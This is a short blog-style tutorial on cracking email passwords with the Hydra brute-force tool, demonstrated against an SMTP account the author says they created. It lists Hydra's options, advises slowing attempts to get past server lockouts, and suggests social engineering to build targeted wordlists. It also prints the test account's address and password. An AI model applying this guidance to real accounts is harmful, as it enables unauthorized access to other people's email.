Hydra

In this post, I will continue cracking type of attacks. Cracking email adresses plays an important role in Cyber Security in the sense that almost every platforms like social media platforms, forums and even certain applications predominantly use email addresses to create and then manage accounts. So it is highly critical to keep your passwords safe and periodically changed. Mail servers could also be configured by administrators to not permit bruteforce attacks. After a certain number of failed attempt to login, you would end up having an unresponsive server. That is when you need to dig deeper into figuring out how you can evade this sort of restrictions. Adjusting the waittime of your cracking process could help at this point.

Hydra is a built-in cracking tool in Kali Linux which can work offline and online platforms. It can work in complaince with plenty of platforms. SSH, RDP, HTTP are just few of those. You should take a look at the full list here. There is also a GUI version of this tool namely Hydra-GTK. But, I am going to stick with the console-based one. What I am going to try in this tutorial is that I will simply prepare a wordlist containing the rights password and afterwards execute a bruteforce attack with it.

Let's get back to the program. Hydra is like the previous tools simple and yet practical. There are certain parameters that are relatively common than other ones. To see the full list of options, you can type hydra -h.

(-R) In case of any mishap or pause, you would like to carry on from where you ended up.
(-S)  It also supports HTTP and HTTPS protocols. When you crack on SSL pages, it's the way to go.
(-s)  Lower case s stands for the port number of the service. Smtp servers usually run on port 465, but it is changeable server to server.
(-l, -L) Lower case l is for singular username cases. Let's say you have three usernames and a wordlist for a certain SSH server but you are not sure what password could belong what. That's when you should add -L parameter.
(-p, -P) Similarly, you have singular and plural options for password here.
(-x) You can generate predefined passwords with this. For example; -x 4:6:A1 generates passwords from 4 to 6 with upper case and numbers. For those who want to dig deeper, take a look at -hydra -h -x.
(-t) Amount of concurrent attempts happening simultaneously.
(-w) Stands for waittime between attempts.
(-v) Verbose mode.
(-V) It shows every login-password pairs attempted.
(-f) Used when you would like to exit after a succesful login found.

These above are common parameters. Every smtp server has a port number on which mail traffic functions. Email management softwares necessitate POP3 and SMTP access. So you should learn what port number your mail server uses. Here is a link you can find a list of mail server list.

I created an account on Yandex mail server beforehand for the sake of this tutorial. The mail account, we are going to work on is pentestingtr@yandex.com and its password is password123. I added this password into the wordlist. I do not recommend a lengthy password list. There's tools like crunch to prepare more specific wordlist for certain targets. Otherwise it would take a very long time to crack. One of the overarching steps in password cracking is to get as much information as you could through social-engineering. It is also a way to guess of the date of birth and name combinations and something like that. You can do that in a more automated way with wordlist generators.

As we predicted, it eventually found the right password at the end succesfully.